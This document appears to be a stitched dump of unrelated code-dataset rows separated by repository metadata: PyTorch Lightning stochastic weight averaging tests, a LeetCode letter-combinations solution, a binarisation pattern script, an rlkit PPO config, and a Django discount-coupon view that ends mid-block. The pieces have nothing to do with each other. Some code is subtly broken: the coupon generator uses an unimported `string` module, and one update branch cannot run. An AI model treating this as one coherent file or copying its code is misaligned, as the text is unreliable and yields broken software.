        if batchnorm:
            layers.append(nn.BatchNorm1d(32))
        layers += [nn.ReLU(), nn.Linear(32, 2)]
        self.layer = nn.Sequential(*layers)
        # 'epoch' or 'step': how often the LR scheduler is advanced.
        self.interval = interval
        self.iterable_dataset = iterable_dataset
    def training_step(self, batch, batch_idx):
        output = self.forward(batch)
        loss = self.loss(batch, output)
        return {"loss": loss}
    def train_dataloader(self):
        # Map-style vs iterable dataset, chosen at construction time.
        dset_cls = RandomIterableDataset if self.iterable_dataset else RandomDataset
        dset = dset_cls(32, 64)
        return DataLoader(dset, batch_size=2)
    def configure_optimizers(self):
        optimizer = torch.optim.SGD(self.layer.parameters(), lr=0.1)
        return {
            "optimizer": optimizer,
            "lr_scheduler": {
                "scheduler": torch.optim.lr_scheduler.StepLR(optimizer, step_size=1),
                "interval": self.interval,
            },
        }
class SwaTestCallback(StochasticWeightAveraging):
    # Call counters checked by the assertions in on_train_end.
    update_parameters_calls: int = 0
    transfer_weights_calls: int = 0
    def update_parameters(self, *args, **kwargs):
        # Count how many times the running SWA average is updated.
        self.update_parameters_calls += 1
        return StochasticWeightAveraging.update_parameters(*args, **kwargs)
    def transfer_weights(self, *args, **kwargs):
        # Count how many times the averaged weights are copied back.
        self.transfer_weights_calls += 1
        return StochasticWeightAveraging.transfer_weights(*args, **kwargs)
    def on_train_epoch_start(self, trainer, *args):
        super().on_train_epoch_start(trainer, *args)
        # Backward is skipped only during the extra batch-norm update epoch
        # (after swa_end); while SWA is active the SWALR scheduler must have
        # replaced the original one, stepping once per epoch.
        assert trainer.fit_loop._skip_backward == (trainer.current_epoch > self.swa_end)
        if self.swa_start <= trainer.current_epoch:
            assert isinstance(trainer.lr_schedulers[0]["scheduler"], SWALR)
            assert trainer.lr_schedulers[0]["interval"] == "epoch"
            assert trainer.lr_schedulers[0]["frequency"] == 1
    def on_train_epoch_end(self, trainer, *args):
        super().on_train_epoch_end(trainer, *args)
        # n_averaged grows by one per epoch inside the SWA window and then
        # stays fixed for the remainder of training.
        if self.swa_start <= trainer.current_epoch <= self.swa_end:
            swa_epoch = trainer.current_epoch - self.swa_start
            assert self.n_averaged == swa_epoch + 1
        elif trainer.current_epoch > self.swa_end:
            assert self.n_averaged == self._max_epochs - self.swa_start
    def on_train_end(self, trainer, pl_module):
        super().on_train_end(trainer, pl_module)
        # make sure these are correctly set again
        assert not trainer.fit_loop._skip_backward
        assert trainer.accumulate_grad_batches == 2
        assert trainer.num_training_batches == 5
        if not isinstance(trainer.training_type_plugin, DDPSpawnPlugin):
            # check backward call count. the batchnorm update epoch should not backward
            assert trainer.accelerator.backward.call_count == trainer.max_epochs * trainer.limit_train_batches
        # check call counts
        assert self.update_parameters_calls == trainer.max_epochs - (self._swa_epoch_start - 1)
        assert self.transfer_weights_calls == 1
def train_with_swa(
    tmpdir, batchnorm=True, strategy=None, gpus=None, num_processes=1, interval="epoch", iterable_dataset=False
):
    """Run a short fit with the SWA test callback and sanity-check the result."""
    callback = SwaTestCallback(swa_epoch_start=2, swa_lrs=0.1)
    # Fresh callback must start with zeroed counters.
    assert callback.update_parameters_calls == 0
    assert callback.transfer_weights_calls == 0
    model = SwaTestModel(batchnorm=batchnorm, interval=interval, iterable_dataset=iterable_dataset)
    trainer = Trainer(
        default_root_dir=tmpdir,
        enable_progress_bar=False,
        max_epochs=5,
        limit_train_batches=5,
        limit_val_batches=0,
        callbacks=[callback],
        accumulate_grad_batches=2,
        strategy=strategy,
        gpus=gpus,
        num_processes=num_processes,
    )
    # Wrap backward so the callback can assert its call count on train end.
    with mock.patch.object(Accelerator, "backward", wraps=trainer.accelerator.backward):
        trainer.fit(model)
    # check the model is the expected
    assert trainer.lightning_module == model
@RunIf(min_gpus=2, special=True)
def test_swa_callback_ddp(tmpdir):
    """SWA end-to-end under multi-GPU DDP."""
    train_with_swa(tmpdir, strategy="ddp", gpus=2)
@RunIf(min_gpus=2)
def test_swa_callback_ddp_spawn(tmpdir):
    """SWA end-to-end under multi-GPU DDP spawn."""
    train_with_swa(tmpdir, strategy="ddp_spawn", gpus=2)
@RunIf(skip_windows=True)
def test_swa_callback_ddp_cpu(tmpdir):
    """SWA end-to-end with CPU-only DDP spawn (two processes)."""
    train_with_swa(tmpdir, strategy="ddp_spawn", num_processes=2)
@RunIf(min_gpus=1)
def test_swa_callback_1_gpu(tmpdir):
    """SWA end-to-end on a single GPU."""
    train_with_swa(tmpdir, gpus=1)
@pytest.mark.parametrize("batchnorm", (True, False))
@pytest.mark.parametrize("iterable_dataset", (True, False))
def test_swa_callback(tmpdir, batchnorm: bool, iterable_dataset: bool):
    """SWA on CPU across batchnorm and iterable/map-style dataset combinations."""
    train_with_swa(tmpdir, batchnorm=batchnorm, iterable_dataset=iterable_dataset)
@pytest.mark.parametrize("interval", ("epoch", "step"))
def test_swa_callback_scheduler_step(tmpdir, interval: str):
    """SWA with the wrapped scheduler stepping per epoch and per step."""
    train_with_swa(tmpdir, interval=interval)
def test_swa_warns(tmpdir, caplog):
    """A step-interval scheduler triggers the SWA support warning and gets swapped."""
    model = SwaTestModel(interval="step")
    trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True, stochastic_weight_avg=True)
    # Expect both the UserWarning and the INFO log about swapping schedulers.
    with caplog.at_level(level=logging.INFO), pytest.warns(UserWarning, match="SWA is currently only supported"):
        trainer.fit(model)
    assert "Swapping scheduler `StepLR` for `SWALR`" in caplog.text
def test_swa_raises():
    """Invalid constructor arguments must raise MisconfigurationException."""
    # swa_epoch_start must be a positive int or a float in (0, 1).
    for bad_start in (0, 1.5, -1):
        with pytest.raises(MisconfigurationException, match=">0 integer or a float between 0 and 1"):
            StochasticWeightAveraging(swa_epoch_start=bad_start, swa_lrs=0.1)
    # Every entry of a swa_lrs list must be a positive float.
    with pytest.raises(MisconfigurationException, match="positive float, or a list of positive floats"):
        StochasticWeightAveraging(swa_epoch_start=5, swa_lrs=[0.2, 1])
@pytest.mark.parametrize("stochastic_weight_avg", [False, True])
@pytest.mark.parametrize("use_callbacks", [False, True])
def test_trainer_and_stochastic_weight_avg(tmpdir, use_callbacks: bool, stochastic_weight_avg: bool):
    """Test to ensure SWA Callback is injected when `stochastic_weight_avg` is provided to the Trainer."""
    class TestModel(BoringModel):
        def configure_optimizers(self):
            # Plain SGD so a Trainer-injected SWA callback can fall back to lr=0.1.
            optimizer = torch.optim.SGD(self.layer.parameters(), lr=0.1)
            return optimizer
    model = TestModel()
    trainer = Trainer(
        default_root_dir=tmpdir,
        callbacks=StochasticWeightAveraging(swa_lrs=1e-3) if use_callbacks else None,
        stochastic_weight_avg=stochastic_weight_avg,
        limit_train_batches=4,
        limit_val_batches=4,
        max_epochs=2,
    )
    trainer.fit(model)
    if use_callbacks or stochastic_weight_avg:
        # Exactly one SWA callback must be present, never a duplicate.
        assert sum(1 for cb in trainer.callbacks if isinstance(cb, StochasticWeightAveraging)) == 1
        # Explicit callback keeps its own lr; the injected one inherits the optimizer lr.
        assert trainer.callbacks[0]._swa_lrs == [1e-3 if use_callbacks else 0.1]
    else:
        assert all(not isinstance(cb, StochasticWeightAveraging) for cb in trainer.callbacks)
def test_swa_deepcopy(tmpdir):
    """Test to ensure SWA Callback doesn't deepcopy dataloaders and datamodule potentially leading to OOM."""
    class TestSWA(StochasticWeightAveraging):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            # Flag flipped inside the hook so the test can verify it really ran.
            self.on_before_accelerator_backend_setup_called = False
        def on_before_accelerator_backend_setup(self, trainer: "Trainer", pl_module: "LightningModule"):
            super().on_before_accelerator_backend_setup(trainer, pl_module)
            # The averaged copy must own its bound train_dataloader, not share the original's...
            assert self._average_model.train_dataloader is not pl_module.train_dataloader
            assert self._average_model.train_dataloader.__self__ == self._average_model
            # ...and must not drag the trainer (and its dataloaders) into the deepcopy.
            assert self._average_model.trainer is None
            self.on_before_accelerator_backend_setup_called = True
    model = BoringModel()
    swa = TestSWA()
    trainer = Trainer(default_root_dir=tmpdir, callbacks=swa, fast_dev_run=True)
    trainer.fit(model, train_dataloader=DataLoader(RandomDataset(32, 2)))
    # Guard against the hook silently not running, which would void the asserts above.
    assert swa.on_before_accelerator_backend_setup_called
def test_swa_multiple_lrs(tmpdir):
    """SWA must honour one swa_lr per optimizer parameter group."""
    swa_lrs = [0.123, 0.321]
    class TestModel(BoringModel):
        def __init__(self):
            # NOTE(review): deliberately skips BoringModel.__init__ (calls its parent
            # instead) so the default `self.layer` is never created — confirm intended.
            super(BoringModel, self).__init__()
            self.layer1 = torch.nn.Linear(32, 32)
            self.layer2 = torch.nn.Linear(32, 2)
        def forward(self, x):
            x = self.layer1(x)
            x = self.layer2(x)
            return x
        def configure_optimizers(self):
            # Two param groups with distinct base lrs, matching the two swa_lrs above.
            params = [{"params": self.layer1.parameters(), "lr": 0.1}, {"params": self.layer2.parameters(), "lr": 0.2}]
            return torch.optim.Adam(params)
        def on_train_epoch_start(self):
            # `trainer` is the enclosing function's variable, resolved at call time.
            optimizer = trainer.optimizers[0]
            assert [pg["lr"] for pg in optimizer.param_groups] == [0.1, 0.2]
            assert [pg["initial_lr"] for pg in optimizer.param_groups] == swa_lrs
            assert [pg["swa_lr"] for pg in optimizer.param_groups] == swa_lrs
            self.on_train_epoch_start_called = True
    model = TestModel()
    swa_callback = StochasticWeightAveraging(swa_lrs=swa_lrs)
    trainer = Trainer(
        default_root_dir=tmpdir,
        callbacks=swa_callback,
        fast_dev_run=1,
    )
    trainer.fit(model)
    # Ensure the epoch hook (and thus its asserts) actually executed.
    assert model.on_train_epoch_start_called
| [
"noreply@github.com"
] | noreply@github.com |
ed6cc8e324e0e9d722dcff91f07aa8abc8df16f3 | a606893da1e354c7c617d0c9247b23118be2813a | /模拟考试/7_20/t8.py | 178465ca3405c74f23f6334c46828faea35f0af3 | [] | no_license | lindo-zy/leetcode | 4ce6cb9ded7eeea0a6953b6d8152b5a9657965da | f4277c11e620ddd748c2a2f3d9f5f05ee58e5716 | refs/heads/master | 2023-07-22T06:19:00.589026 | 2023-07-16T12:35:14 | 2023-07-16T12:35:14 | 229,958,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
from itertools import product
from typing import List
class Solution:
    """Letter Combinations of a Phone Number (LeetCode 17)."""
    def letterCombinations(self, digits: str) -> List[str]:
        """Return every letter string the digit sequence can spell on a phone keypad.

        An empty input yields [] explicitly — ``product()`` with no iterables
        would otherwise emit a single empty tuple.
        """
        # String keys avoid the per-digit int() conversion of the original.
        keypad = {'2': 'abc', '3': 'def', '4': 'ghi',
                  '5': 'jkl', '6': 'mno', '7': 'pqrs',
                  '8': 'tuv', '9': 'wxyz'}
        if not digits:
            return []
        groups = [keypad[d] for d in digits]
        # product() streams tuples lazily; no need to materialize a list first.
        return [''.join(combo) for combo in product(*groups)]
if __name__ == '__main__':
    # Quick manual check: print all combinations for the sample input.
    solver = Solution()
    print(solver.letterCombinations("234"))
| [
"492201845@qq.com"
] | 492201845@qq.com |
f889a1191f24e0efa33abc9e969d0f9330c75227 | 5a094639f077d85f530c1df874aa4aaf39087757 | /basicPatternGeneration.py | b25271946dbaf5bf73ec794226b04f94503a7edd | [] | no_license | priyanshu1994/LAD-Tools-BTP- | 6936003c9887026f1b0a68526000423ae019dc0b | d0d9c3e27520c7f8a97de905832220e8303d62d4 | refs/heads/master | 2021-01-21T13:29:59.522102 | 2016-05-05T06:55:34 | 2016-05-05T06:55:34 | 53,981,183 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | import binarisationVariables as BV
from excelFileReader import *
import json
def convertBinaryToInt(list):
val = 0
for attribute in list:
val = val * 2 + attribute
val = val - 1
val = val / 2
return val
def basicPatternGeneration():
    """Encode every positive observation and dump the set to patterns.txt.

    Scans the module-level ``BV.items`` matrix; rows whose last attribute is 1
    (presumably the positive class — confirm against the binarisation module)
    are encoded via ``convertBinaryToInt`` and stored as dict keys mapping to 1.
    NOTE(review): json.dump stringifies the numeric keys on write.
    """
    dict = {}  # NOTE(review): shadows the builtin `dict` inside this function
    i = 0
    for item in BV.items:
        if item[BV.numberOfAttributes - 1] == 1:
            val = convertBinaryToInt(item)
            dict[val] = 1
    # print dict
    json.dump(dict, open("patterns.txt","w"))  # NOTE(review): file handle never closed
"priyanshu581994@gmail.com"
] | priyanshu581994@gmail.com |
9e705405bf51c0c78f3aa9cea75c16792a078e88 | 197f89938ff9b056c32b5fcdd9386c02f02f5ca8 | /rlkit/examples/variant.py | fc279c71bab63b2a79dd28c176fcb00a5a981331 | [
"MIT"
] | permissive | cvigoe/DRL4MAAS | b8a4a4529c1df8bfe698b83fdffd05646a54cd82 | 95539197c9b82a34f9128fd265749d0f8f76157f | refs/heads/main | 2023-08-11T05:56:16.587227 | 2021-09-19T21:40:18 | 2021-09-19T21:40:18 | 404,843,072 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,836 | py | variant = dict(
mlflow_uri="http://128.2.210.74:8080",
gpu=False,
algorithm="PPO",
version="normal",
layer_size=64, # Need to tune & fix in code
replay_buffer_size=int(3E3),
algorithm_kwargs=dict(
min_num_steps_before_training=0,
num_epochs=3000,
num_eval_steps_per_epoch=1000,
num_train_loops_per_epoch=10,
num_expl_steps_per_train_loop=2048,
num_trains_per_train_loop=100,
batch_size=256,
max_path_length=100,
clear_buffer_every_train_loop=True,
),
trainer_kwargs=dict(
epsilon=0.25, # Need to tune
discount=.99, # Need to tune
intrinsic_discount=.9999,
policy_lr=3E-4, # Need to tune
val_lr=3E-4, # No need to use different
use_rnd=False,
rnd_coef=10,
predictor_update_proportion=0.25,
),
rnd_kwargs=dict(
rnd_output_size=512,
rnd_lr=3E-4,
rnd_latent_size=64,
),
target_kwargs=dict(
tdlambda=0.95,
target_lookahead=15,
use_dones_for_rnd_critic=False,
),
policy_kwargs=dict(
std=0.1,
),
)
# Environment selection for the experiment.
env_variant = {
    "env_str": "Swimmer-v2",
}
# env_variant = dict(
# env_str='activesearchrlpoissonmlemap-v0',
# lam=1,
# sigma2=1,
# num_agents=5,
# num_hypotheses=30,
# num_timesteps=30,
# num_EA_iterations=10,
# EA_tolerance=0.0001,
# cost_iterations=10,
# upper_limit_N=10,
# log_space_resolution=100,
# MLE_regularizer=.1,
# WASSERSTEIN_ITERS=100,
# verbose=False,
# adaptive_grid=False,
# direct_wasserstein=True,
# fisher_in_state=False,
# reward_shaping=False,
# )
| [
"cvigoe@gmail.com"
] | cvigoe@gmail.com |
b8b2d770fa56dc2737b20940196ba21100eeede9 | 85eff920f0f285abad84c2f6bcfd4f236f3976ab | /webservices/views/product/Discount.py | 2addd7a58ad5beee740e07d16fa28b10c0c2115c | [] | no_license | obxlifco/Web-Picking-App-GoGrocery | 8cf5f7924005a19764e5c4722a47bfd963965f2e | 6b084547bed2af43a67bada313d68e56f4228f96 | refs/heads/main | 2023-05-26T08:32:30.297317 | 2021-06-12T10:05:01 | 2021-06-12T10:05:01 | 315,206,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,390 | py | from webservices.models import *
from django.http import Http404
from webservices.serializers import *
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
from rest_framework.parsers import JSONParser
from datetime import date,datetime
from rest_framework import generics
from itertools import chain
from django.core import serializers
from django.http import HttpResponse
from django.db.models import Q
from django.core.files.storage import FileSystemStorage
from webservices.views import loginview
from django.utils.crypto import get_random_string
import datetime
import json
import random
import os
import ast
import xlsxwriter
import xlrd
import sys
import traceback
from webservices.views.common import common
# class DiscountSet is used to insert Discount
class DiscountSet(generics.ListAPIView):
    """Create (or upsert) a discount master, its freebie mappings and coupon codes."""
    def post(self, request, format=None):
        """Persist the discount payload carried in ``request.data['value']``.

        Branches on ``has_multiplecoupons``:
        * 'n' with a coupon-based type: single coupon, uniqueness-checked.
        * 'n' with type 0: no coupon code involved.
        * otherwise: bulk coupons, either supplied or auto-generated.
        Returns a {'status', 'api_status', 'message'} envelope.
        """
        company_db = loginview.db_active_connection(request)
        has_multy = request.data['value']
        name = has_multy['name']
        # namelower = name.lower()
        # name1 = namelower.replace(" ", "-")
        # nametrns = name1.translate(
        #     {ord(c): "" for c in "!@#$%^&*()[]{};:,./<>?\|`~=+\"\'"})
        # slugname = slugify(nametrns)
        # cnt = EngageboostDiscountMasters.objects.filter(name=name).count()
        # if cnt == 0:
        #     cnt = cnt
        #     slugname = slugname
        # elif cnt == 1:
        #     cnt = cnt
        #     slugname = slugname + '1'
        # else:
        #     slugname = slugname + str(cnt)
        # slugname = common.create_discount_slug(name)
        # Nested read-only representations must not reach the serializer.
        if 'DiscountMastersConditions' in has_multy.keys():
            has_multy.pop('DiscountMastersConditions')
        if 'DiscountMastersCoupons' in has_multy.keys():
            has_multy.pop('DiscountMastersCoupons')
        discount_master_type = has_multy['discount_master_type']
        product_id_qty = ""
        if 'product_id_qty' in has_multy.keys():
            product_id_qty = has_multy['product_id_qty']
        is_mul = has_multy['has_multiplecoupons']
        # Stamp audit fields; payload + stamps feed the serializer below.
        d1 = {'created': datetime.datetime.now(), 'modified': datetime.datetime.now(), 'used_coupon': 0}
        serializer_data = dict(has_multy, **d1)
        if is_mul == 'n':
            if discount_master_type != 0:
                # Single-coupon discount: build the final code as prefix + code + suffix.
                coupon_code = has_multy['coupon_code']
                if has_multy['coupon_prefix'] is None:
                    has_multy['coupon_prefix'] = ""
                if has_multy['coupon_suffix'] is None:
                    has_multy['coupon_suffix'] = ""
                if has_multy['coupon_prefix'] is not None and has_multy['coupon_prefix'] != "":
                    # NOTE(review): str.strip(prefix) strips a character SET, not the
                    # literal prefix — confirm this does not mangle coupon codes.
                    has_multy['coupon_code'] = str(has_multy['coupon_code']).strip(str(has_multy['coupon_prefix']))
                    coupon_code = str(has_multy['coupon_prefix']).strip() + str(coupon_code).strip()
                if has_multy['coupon_suffix'] is not None and has_multy['coupon_suffix'] != "":
                    has_multy['coupon_code'] = str(has_multy['coupon_code']).strip() + str(
                        has_multy['coupon_suffix']).strip()
                    coupon_code = str(coupon_code).strip() + str(has_multy['coupon_suffix']).strip()
                serializer_data['coupon_code'] = coupon_code
                # NOTE(review): this query (and the ones below) skip .using(company_db)
                # unlike the rest of the module — confirm the default DB is correct.
                cnt = EngageboostDiscountMasters.objects.filter(coupon_code=coupon_code).count()
                if cnt == 0:
                    if 'id' in has_multy.keys():
                        # Upsert path: re-serialize onto the existing master row.
                        discount_id = has_multy['id']
                        creditObj = EngageboostDiscountMasters.objects.get(id=discount_id)
                        serializer_data.pop("id")
                        serializer = DiscountMasterSerializer(creditObj, data=serializer_data, partial=True)
                    else:
                        serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
                    if serializer.is_valid():
                        serializer.save()
                        # NOTE(review): latest('id') after save is race-prone under
                        # concurrent inserts — confirm acceptable.
                        obj = EngageboostDiscountMasters.objects.latest('id')
                        last_id = obj.id
                        if product_id_qty:
                            # "pid@qty,pid@qty" list: rebuild the freebie mappings.
                            product_id_qtys = product_id_qty.split(",")
                            if len(product_id_qtys) > 0:
                                EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=last_id).delete()
                                for item in product_id_qtys:
                                    pro_qty = item.split("@")
                                    current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
                                    EngageboostDiscountFreebieMappings.objects.create(discount_master_id=last_id,
                                                                                     product_id=pro_qty[0],
                                                                                     qty=pro_qty[1],
                                                                                     created=current_date,
                                                                                     modified=current_date)
                        data = {
                            'status': 1,
                            'api_status': {"id": last_id},
                            'message': 'Successfully Inserted',
                        }
                        return Response(data)
                    else:
                        data = {
                            'status': 0,
                            'api_status': serializer.errors,
                            'message': 'Data Not Found',
                        }
                        return Response(data)
                else:
                    data = {
                        'status': 0,
                        'message': 'Coupon code already exists',
                    }
                    return Response(data)
            else:
                # Type 0: discount without a coupon code; same save + freebie flow.
                if 'id' in has_multy.keys():
                    discount_id = has_multy['id']
                    creditObj = EngageboostDiscountMasters.objects.get(id=discount_id)
                    serializer_data.pop("id")
                    serializer = DiscountMasterSerializer(creditObj, data=serializer_data, partial=True)
                else:
                    serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
                if serializer.is_valid():
                    serializer.save()
                    obj = EngageboostDiscountMasters.objects.latest('id')
                    last_id = obj.id
                    if product_id_qty:
                        product_id_qtys = product_id_qty.split(",")
                        if len(product_id_qtys) > 0:
                            EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=last_id).delete()
                            for item in product_id_qtys:
                                pro_qty = item.split("@")
                                current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
                                EngageboostDiscountFreebieMappings.objects.create(discount_master_id=last_id,
                                                                                 product_id=pro_qty[0], qty=pro_qty[1],
                                                                                 created=current_date,
                                                                                 modified=current_date)
                    data = {
                        'status': 1,
                        'api_status': {"id": last_id},
                        'message': 'Successfully Inserted',
                    }
                    return Response(data)
                else:
                    data = {
                        'status': 0,
                        'api_status': serializer.errors,
                        'message': 'Data Not Found',
                    }
                    return Response(data)
        else:
            # Multi-coupon discount: save the master, then attach coupon rows.
            d1 = request.data['value']
            # NOTE(review): d1 is immediately overwritten below, so the 'id' in d1
            # upsert branch can never fire — confirm the intended behavior.
            d1 = {'created': datetime.datetime.now(), 'modified': datetime.datetime.now()}
            serializer_data = dict(has_multy, **d1)
            if 'id' in d1.keys():
                discount_id = d1['id']
                creditObj = EngageboostDiscountMasters.objects.get(id=discount_id)
                serializer_data.pop("id")
                serializer = DiscountMasterSerializer(creditObj, data=serializer_data, partial=True)
            else:
                serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
            if serializer.is_valid():
                serializer.save()
                obj = EngageboostDiscountMasters.objects.latest('id')
                last_id = obj.id
                if product_id_qty:
                    product_id_qtys = product_id_qty.split(",")
                    if len(product_id_qtys) > 0:
                        EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=last_id).delete()
                        for item in product_id_qtys:
                            pro_qty = item.split("@")
                            current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
                            EngageboostDiscountFreebieMappings.objects.create(discount_master_id=last_id,
                                                                             product_id=pro_qty[0], qty=pro_qty[1],
                                                                             created=current_date,
                                                                             modified=datetime.datetime.now())
                # Coupons may be supplied explicitly, otherwise they are generated.
                if 'multiple_coupons' in has_multy.keys():
                    if request.data['multiple_coupons']:
                        list_of_multiple_coupons = request.data['multiple_coupons']
                    else:
                        list_of_multiple_coupons = None
                else:
                    list_of_multiple_coupons = None
                if list_of_multiple_coupons:
                    for coupon_code in list_of_multiple_coupons:
                        cnt = EngageboostDiscountMastersCoupons.objects.filter(coupon_code=coupon_code).count()
                        if cnt == 0:
                            User = EngageboostDiscountMastersCoupons.objects.create(website_id=has_multy['website_id'],
                                                                                   discount_master_id=last_id,
                                                                                   coupon_code=coupon_code,
                                                                                   created=datetime.datetime.now())
                            data = {
                                'status': 1,
                                'api_status': {"id": last_id},
                                'message': 'Successfully Inserted',
                            }
                        else:
                            # NOTE(review): a later duplicate overwrites the success
                            # response for earlier coupons — confirm intended.
                            data = {
                                'status': 0,
                                'message': 'Coupon code already exists',
                            }
                else:
                    # Auto-generate `number_of_coupon` unique random codes.
                    no_of_coupon = has_multy["number_of_coupon"]
                    flag = 0
                    sresult = 1
                    list_of_multiple_coupons = []
                    prefix = suffix = ""
                    if 'prefix' in has_multy.keys():
                        prefix = has_multy['prefix']
                    if 'suffix' in has_multy.keys():
                        suffix = has_multy['suffix']
                    while sresult != -1 and flag < no_of_coupon:
                        # NOTE(review): `string` does not appear in this module's
                        # imports — verify this branch does not raise NameError.
                        res = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
                        res = str(prefix) + str(res).lower() + str(suffix)
                        result = EngageboostDiscountMastersCoupons.objects.filter(isdeleted='n',
                                                                                 coupon_code=res).count()
                        if result > 0:
                            pass
                        else:
                            list_of_multiple_coupons.append(res)
                            sresult = int(flag)
                            flag += 1
                    for coupon_code in list_of_multiple_coupons:
                        User = EngageboostDiscountMastersCoupons.objects.create(website_id=has_multy['website_id'],
                                                                               discount_master_id=last_id,
                                                                               coupon_code=coupon_code,
                                                                               created=datetime.datetime.now())
                    data = {
                        'status': 1,
                        'api_status': {"id": last_id},
                        'message': 'Successfully Inserted',
                    }
                return Response(data)
            else:
                data = {
                    'status': 0,
                    'api_status': serializer.errors,
                    'message': 'Data Not Found',
                }
                return Response(data)
# class DiscountList is used to fetch list of all Discount
class DiscountList(generics.ListAPIView):
    """Fetch (GET) and update (PUT) a single discount master by primary key."""
    def get_object(self, pk, request):
        # Resolve the discount master on the tenant database or raise 404.
        company_db = loginview.db_active_connection(request)
        try:
            return EngageboostDiscountMasters.objects.using(company_db).get(pk=pk)
        except EngageboostDiscountMasters.DoesNotExist:
            raise Http404
    #///////////////////Fetch Single Row
    def get(self, request, pk, format=None):
        """Return the master row, its coupon codes and all active customer groups."""
        company_db = loginview.db_active_connection(request)
        coupon_code=[]
        dis = self.get_object(pk,request)
        serializer = DiscountMasterSerializer(dis)
        couponcode1=EngageboostDiscountMastersCoupons.objects.using(company_db).all().filter(discount_master_id=pk)
        customergrp = EngageboostCustomerGroup.objects.using(company_db).all().filter(isdeleted='n',
                                                                                      isblocked='n').order_by('name')
        customer = CustomerGroupSerializer(customergrp, many=True)
        for coupon in couponcode1:
            coupon_array={'coupon_code':coupon.coupon_code,'is_used':coupon.is_used}
            coupon_code.append(coupon_array)
        # NOTE(review): a bound serializer instance is always truthy, so the
        # else branch below is unreachable — confirm intended.
        if(serializer):
            data ={
                'status':1,
                'api_status':serializer.data,
                'multiple_coupons':coupon_code,
                'customer_group':customer.data,
                'message':'',
            }
        else:
            data ={
                'status':0,
                'api_status':serializer.errors,
                'message':'Data Not Found',
            }
        return Response(data)
    # Update Discount
    def put(self, request, pk, format=None,partial=True):
        """Update the discount master; branches mirror DiscountSet.post.

        The type-0 branch additionally diffs affected product ids and queues a
        re-sync row in EngageboostUpdateQueue for downstream price updates.
        """
        company_db = loginview.db_active_connection(request)
        dis = self.get_object(pk,request)
        coupon_code = request.data['value']['coupon_code']
        #------Binayak Start 11-03-2021-----#
        warehouse = request.data['value']['warehouse']
        # print("======warehouse======", warehouse)
        # ------Binayak End 11-03-2021-----#
        has_multy = request.data['value']
        # Drop nested read-only representations before serializing.
        if 'DiscountMastersConditions' in has_multy.keys():
            has_multy.pop('DiscountMastersConditions')
        if 'DiscountMastersCoupons' in has_multy.keys():
            has_multy.pop('DiscountMastersCoupons')
        is_mul = has_multy['has_multiplecoupons']
        discount_master_type = has_multy['discount_master_type']
        # print('Chakradhar Working', is_mul, discount_master_type)
        product_id_qty = ""
        if 'product_id_qty' in has_multy.keys():
            product_id_qty = has_multy['product_id_qty']
        d1={'modified':datetime.datetime.now()}
        serializer_data=dict(has_multy,**d1)
        if is_mul == 'n':
            if discount_master_type != 0:
                # Single coupon: the code must be unique across other masters.
                cnt=EngageboostDiscountMasters.objects.using(company_db).filter(coupon_code=coupon_code).filter(~Q(id=pk)).count()
                if cnt ==0:
                    serializer = DiscountMasterSerializer(dis,data=serializer_data,partial=True)
                    if serializer.is_valid():
                        latest = serializer.save()
                        if product_id_qty:
                            # "pid@qty,pid@qty" list: rebuild the freebie mappings.
                            product_id_qtys = product_id_qty.split(",")
                            if len(product_id_qtys)>0:
                                EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=latest.id).delete()
                                for item in product_id_qtys:
                                    pro_qty = item.split("@")
                                    current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
                                    EngageboostDiscountFreebieMappings.objects.create(discount_master_id=latest.id,product_id=pro_qty[0],qty=pro_qty[1],created=current_date,modified=current_date)
                        data = {
                            'status':1,
                            'api_status':'',
                            'message':'Successfully Updated',
                        }
                        return Response(data)
                    else:
                        data ={
                            'status':0,
                            'api_status':serializer.errors,
                            'message':'Data Not Found',
                        }
                        return Response(data)
                else:
                    data ={
                        'status':0,
                        'message':'Coupon code is already exists',
                    }
                    return Response(data)
            else:
                # Type 0 (no coupon): save, then queue affected products for re-sync.
                serializer = DiscountMasterSerializer(dis,data=serializer_data,partial=True)
                if serializer.is_valid():
                    # Snapshot products/warehouses BEFORE saving so the diff is real.
                    prev_products = list(EngageboostDiscountMastersConditions.objects.filter(discount_master_id = pk).values_list('all_product_id',flat=True))
                    prev_warehouses = EngageboostDiscountMasters.objects.filter(id=pk).first().warehouse_id
                    latest = serializer.save()
                    if product_id_qty:
                        product_id_qtys = product_id_qty.split(",")
                        if len(product_id_qtys)>0:
                            EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=latest.id).delete()
                            for item in product_id_qtys:
                                pro_qty = item.split("@")
                                current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
                                EngageboostDiscountFreebieMappings.objects.create(discount_master_id=latest.id,product_id=pro_qty[0],qty=pro_qty[1],created=current_date,modified=current_date)
                    data ={
                        'status':1,
                        'api_status':'',
                        'message':'Successfully Updated',
                    }
                    # Union of pre- and post-save product ids tied to the conditions.
                    objproduct_list = EngageboostDiscountMastersConditions.objects.filter(discount_master_id = pk).values_list('all_product_id',flat=True)
                    if(prev_products):
                        objproduct_list = list(objproduct_list)
                        objproduct_list.extend(prev_products)
                        objproduct_list = list(set(objproduct_list))
                    # if objproduct_list :
                    #     for elastic_product_id in objproduct_list:
                    #         if(elastic_product_id is not None):
                    #             print('Hello', elastic_product_id)
                    #             if("," in elastic_product_id):
                    #                 prod_lst = elastic_product_id.split(",")
                    #                 elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst)
                    #             else:
